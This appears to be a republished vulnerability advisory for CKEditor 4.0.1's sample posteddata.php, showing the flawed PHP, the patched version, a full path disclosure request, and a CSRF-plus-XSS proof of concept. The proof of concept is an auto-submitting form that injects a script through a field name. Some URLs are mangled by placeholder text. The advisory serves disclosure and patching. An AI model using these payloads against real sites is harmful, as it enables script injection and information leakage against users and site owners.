影响程序: ckeditor 4.0.1 standard
下载 地址: http://download.cksource测试数据/CKEditor/CKEditor/CKEditor%204.0.1/ckeditor_4.0.1_standard.zip
缺陷类型: Full Path Disclosure && XSS
===========================================
服务器版本: Apache/2.2.16 (Debian)
PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) (built: Aug 6 2012 20:08:59)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
with Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH
===========================================
缺陷代码: /ckeditor/samples/assets/posteddata.php
=============SNIP BEGINS====================
root@debian:/etc/apache2/htdocs/hacker1/admin/ckeditor/samples/assets# cat posteddata.php
<!DOCTYPE html >
<?php
/*
Copyright (c) 2003-2013, CKSource - Frederico Knabben. All rights reserved.
For licensing, see LICENSE.html or http://ckeditor测试数据/license
*/
?>
<html>
<head>
<meta charset="utf-8">
<title>Sample — CKEditor</title>
<link rel="stylesheet" href="sample.css">
</head>
<body>
<h1 class="samples">
CKEditor — Posted Data
</h1>
<table border="1" cellspacing="0" id="outputSample">
<colgroup><col width="120"></colgroup>
<thead>
<tr>
<th>Field Name</th>
<th>Value</th>
</tr>
</thead>
<?php
if ( isset( $_POST ) )
$postArray = &$_POST ; // 4.1.0 or later, use $_POST
else
$postArray = &$HTTP_POST_VARS ; // prior to 4.1.0, use HTTP_POST_VARS
foreach ( $postArray as $sForm => $value )
{
if ( get_magic_quotes_gpc() )
$postedValue = htmlspecialchars( stripslashes( $value ) ) ;
else
$postedValue = htmlspecialchars( $value ) ;
?>
<tr>
<th style="vertical-align: top"><?php echo $sForm?></th>
<td><pre class="samples"><?php echo $postedValue?></pre></td>
</tr>
<?php
}
?>
</table>
<div id="footer">
<hr>
<p>
CKEditor - The text editor for the Internet - <a class="samples" href="http://ckeditor测试数据/">http://ckeditor测试数据</a>
</p>
<p id="copy">
Copyright © 2003-2013, <a class="samples" href="http://cksource测试数据/">CKSource</a> - Frederico Knabben. All rights reserved.
</p>
</div>
</body>
</html>
=============SNIP ENDS HERE====================
FULL Path Disclosure example:
URL: http://HdhCmsTest2cto测试数据 /admin/ckeditor/samples/sample_posteddata.php
METHOD: $_POST
HEADERS:
Host: hacker1.own
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
$_POST DATA TO SEND:
bangbangbang[]=PATH DISCLOSURE
Result:
Print screen: http://i076.radikal.ru/1302/84/edbe3f8f4524.png
HdhCmsTest2cto测试数据
=================================================
CSRF+XSS
<body onload="javascript:document.forms[0].submit()">
<form name="form1" method="post" action="http://hacker1.own/admin/ckeditor/samples/sample_posteddata.php" enctype="multipart/form-data">
<input type="hidden" name="<script>alert('AkaStep');</script>" id="fupl" value="SENDF"></li>
</form>
=================================================
Print Screen: http://i062.radikal.ru/1302/e6/25ef023dd589.png
=================================================
And here is fixed version: /ckeditor/samples/assets/posteddata.php
================SNIP BEGINS=======================
<!DOCTYPE html>
<?php
/*
Copyright (c) 2003-2013, CKSource - Frederico Knabben. All rights reserved.
For licensing, see LICENSE.html or http://ckeditor测试数据/license
*/
?>
<html>
<head>
<meta charset="utf-8">
<title>Sample — CKEditor</title>
<link rel="stylesheet" href="sample.css">
</head>
<body>
<h1 class="samples">
CKEditor — Posted Data
</h1>
<table border="1" cellspacing="0" id="outputSample">
<colgroup><col width="120"></colgroup>
<thead>
<tr>
<th>Field Name</th>
<th>Value</th>
</tr>
</thead>
<?php
if ( isset( $_POST ) )
$postArray = &$_POST ; // 4.1.0 or later, use $_POST
else
$postArray = &$HTTP_POST_VARS ; // prior to 4.1.0, use HTTP_POST_VARS
foreach ( $postArray as $sForm => $value )
{
if ( get_magic_quotes_gpc() )
$postedValue = htmlspecialchars( stripslashes((string) $value ) ) ;
else
$postedValue =htmlspecialchars((string) $value ) ;
?>
<tr>
<th style="vertical-align: top"><?php echo htmlspecialchars((string)$sForm);?></th>
<td><pre class="samples"><?php echo $postedValue?></pre></td>
</tr>
<?php
}
?>
</table>
<div id="footer">
<hr>
<p>
CKEditor - The text editor for the Internet - <a class="samples" href="http://ckeditor测试数据/">http://ckeditor测试数据</a>
</p>
<p id="copy">
Copyright © 2003-2013, <a class="samples" href="http://cksource测试数据/">CKSource</a> - Frederico Knabben. All rights reserved.
</p>
</div>
</body>
</html>
查看更多关于CKEditor 4.0.1 - Multiple Vulnerabilities - 网站安全的详细内容...